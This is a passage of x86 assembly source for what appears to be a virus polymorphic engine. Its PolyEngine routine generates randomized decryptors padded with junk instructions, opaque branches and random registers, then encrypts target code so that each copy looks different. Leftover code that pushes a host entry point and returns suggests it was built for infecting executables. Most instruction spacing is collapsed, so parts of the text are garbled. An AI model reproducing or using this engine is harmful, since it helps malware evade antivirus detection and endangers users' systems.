; Disabled tail (jmp reg / push EntryPoint / ret); the emitted code ends
; after the junk above.
;movbyteptr[edi],0FFh
;incedi
;movedx,0E0h
;addedx,regOfAddr
;movbyteptr[edi],dl;Jmpregxx
;incedi
;callGenerateRandOpCode
;callGFI
;movbyteptr[edi],68h;PushEntryPoint
;incedi
;movedx,EntryPoint
;movdwordptr[edi],edx
;addedi,4
;callGenerateRandOpCode
;callGFI
;movbyteptr[edi],0C3h;Ret
;incedi
lbl_Exit5:
popall
ret
G4Codeendp
; Core of the whole program (the polymorphic engine).
; Assume the decryptor looks like this (it splits into 4 parts):
;   mov reg00, SizeOfCode            (part 1)
;   mov reg11, EntryPointOfCode      (part 2)
; Rep:
;   xor dword ptr [reg00+reg11], key (part 3)
;   dec reg00                        (part 4)
;   jnz Rep
; To make the engine stronger, the code above is decomposed (transformed)
; as follows:
; Part 1 has the following 5 choices (reg00 is a randomly chosen register):
;   mov reg00, SizeOfCode ---> mov reg00, xxx / add reg00, xxx   (0)
;                              push xxx / pop reg00              (1)
;                              mov reg00, xxx / xor reg00, xxx   (2)
;                              mov reg00, xxx / not reg00        (3)
;                              mov reg00, xxx / rol reg00, xx    (4)
;
; Part 2 likewise has 5 choices:
;   mov reg11, EntryPointOfCode is handled the same way.
; Part 3 has 8 choices (0..7):
;   likewise xor dword ptr [reg00+reg11], key can be transformed into
;   add / sub / inc / dec / not / rol / ror ... etc.
;   (The implementation works byte-wise on [reg11] and advances reg11
;    each iteration; rol/ror are disabled, see G3Code.)
;
; Part 4 has 2 choices:
;   dec reg00 / jnz xxx ---> loop xxx
;   (In G4Code, 0 is the dec/jg shape and 1 the loop shape.)
; param Buf: buffer that receives the transformed code
; param StartAddress: start address of the code to encrypt
; param dwLength: length of the code to encrypt
;
EncryptSelecteddd0; decrypt operation chosen by G3Code (0..5)
G2Selecteddd0; shape chosen by G2Code for part 2 (0..4)
AddressOfCode1dd0; buffer addresses of part 2's immediate slots,
AddressOfCode2dd0; patched by PolyEngine once the address is known
keydd0; key byte (0..254) used by part 3
; PolyEngine: build a polymorphic decryptor in Buf for the dwLength bytes
; of code at StartAddress, then encrypt that code with the matching inverse.
; stdcall: Buf, StartAddress, dwLength, VA, EntryPoint.
;   VA != 0: the code is encrypted in place and VA is taken as the address
;            the encrypted bytes will have at run time (patched into part 2).
;   VA == 0: the code is copied to the byte right after the decryptor in
;            Buf and encrypted there; the address patched into part 2 is
;            that buffer address.
; Returns eax = pointer just past the last encrypted byte. Does not
; preserve registers (the trailing popad is commented out): ebx, ecx, edx,
; esi and edi are clobbered. dwLength = 0 is not handled by the
; "loop"-based encryption loops. EntryPoint is passed to G4Code, which
; does not use it.
; Emitted layout: junk, GFI, part 1 (length -> Reg_Length), junk, GFI,
; part 2 (address -> Reg_StartAddress), part 4 loop containing part 3.
; Register 0 (eax) never becomes Reg_Length or Reg_StartAddress because
; RandomReg rejects whatever those slots hold, and they start at 0.
PolyEngineprocBuf:dword,StartAddress:dword,dwLength:dword,VA:dword,EntryPoint:dword
callPolyStart; esi = load delta
PolyStart:
popesi
subesi,offsetPolyStart; relocate
callRandomize; seed the generator from rdtsc
push8
callRandomReg
movdwordptrReg_Length[esi],eax; register that will hold the length
Rep0:
push8
callRandomReg
cmpeax,Reg_Length[esi]; must differ from the length register
jzRep0
movdwordptrReg_StartAddress[esi],eax; register that will hold the address
movedi,Buf; edi = output cursor for the whole build
pushesi
callGenerateRandOpCode; 1..10 junk instructions
popesi
callGFI; opaque branch
pushesi
pushReg_Length[esi]
pushdwLength
callG1Code; part 1: Reg_Length = dwLength
popesi
callGenerateRandOpCode; junk
callGFI; opaque branch
pushesi
pushReg_StartAddress[esi]
callG2Code; part 2: Reg_StartAddress = <patched below>
popesi
pushesi
push0FFh
callRandom; key byte in 0..254
popesi
movkey[esi],eax
pushesi
pushEntryPoint
pushkey[esi]
pushReg_StartAddress[esi]
pushReg_Length[esi]
callG4Code; part 4 loop with the part 3 step inside
popesi
moveax,G2Selected[esi]; shape used by part 2
pushedi; keep the output cursor (end of the decryptor)
pushecx
; Patch part 2's placeholder immediates so the address register ends up
; holding the start of the encrypted code. Shapes as in G2Code:
;   0: mov reg, A-r / add reg, r      2: mov reg, A xor r / xor reg, r
;   1: push A / pop reg               3: mov reg, not A / not reg
;   4: mov reg, ror(A,c) / rol reg, c
.ifVA!=0
movedi,VA; A = run-time address supplied by the caller
.endif
; otherwise edi is still the output cursor, i.e. the buffer address at
; which the code is copied below
.ifeax==0
push0FFFFFFFFh
callRandom
subedi,eax; A - r
movebx,AddressOfCode1[esi]
mov[ebx],edi
movebx,AddressOfCode2[esi]
mov[ebx],eax; r
.elseifeax==1
movebx,AddressOfCode1[esi]
mov[ebx],edi; A
.elseifeax==2
push0FFFFFFFFh
callRandom
xoredi,eax; A xor r
movebx,AddressOfCode1[esi]
mov[ebx],edi
movebx,AddressOfCode2[esi]
mov[ebx],eax; r
.elseifeax==3
notedi; not A
movebx,AddressOfCode1[esi]
mov[ebx],edi
.else
push020h
callRandom
movcl,al; c = 0..31
roredi,cl; ror(A, c)
movebx,AddressOfCode1[esi]
mov[ebx],edi
movebx,AddressOfCode2[esi]
movbyteptr[ebx],cl; the rol count
.endif
popecx
popedi
; Now encrypt the code with the inverse of the decrypt step G3Code chose:
;   0 xor  1 add  2 sub  3 inc  4 dec  5 not   (rol/ror disabled)
moveax,EncryptSelected[esi]
movecx,dwLength; ecx = byte count for the loops below
.ifVA==0
pushad
movesi,StartAddress
cld
repmovsb; copy the code to [edi], right after the decryptor
popad; restores edi (copy start) and ecx (dwLength)
.else
movedi,StartAddress; encrypt in place
.endif
movedx,key[esi]; dl = key byte
.ifeax==0; xor
Rep1:
xorbyteptr[edi],dl
incedi
loopRep1
.elseifeax==1; add (decryptor subtracts)
Rep2:
addbyteptr[edi],dl
incedi
loopRep2
.elseifeax==2; sub (decryptor adds)
Rep3:
subbyteptr[edi],dl
incedi
loopRep3
.elseifeax==3; inc (decryptor decrements)
Rep4:
incbyteptr[edi]
incedi
loopRep4
.elseifeax==4; dec (decryptor increments)
Rep5:
decbyteptr[edi]
incedi
loopRep5
.elseifeax==5; not
Rep6:
movbl,byteptr[edi]
notbl
movbyteptr[edi],bl
incedi
loopRep6
;.elseifeax==6;rol
Rep7:; label left over from the disabled rol loop
;roldwordptr[edi],edx
;incedi
;loopRep7
;.else;ror
Rep20:; label left over from the disabled ror loop
;rordwordptr[edi],edx
;incedi
;loopRep20
.endif
moveax,edi; return the address just past the encrypted bytes
;popad
ret
PolyEngineendp
RealSizeequ$-offsetlbl_PolyStart; byte size of the engine image
SizeOfCodeequ((($-offsetlbl_PolyStart)*10)/1000h+1)*1000h; 10x the engine size, rounded up to the next 1000h multiple (presumably the buffer size a caller allocates; confirm against the host)
;end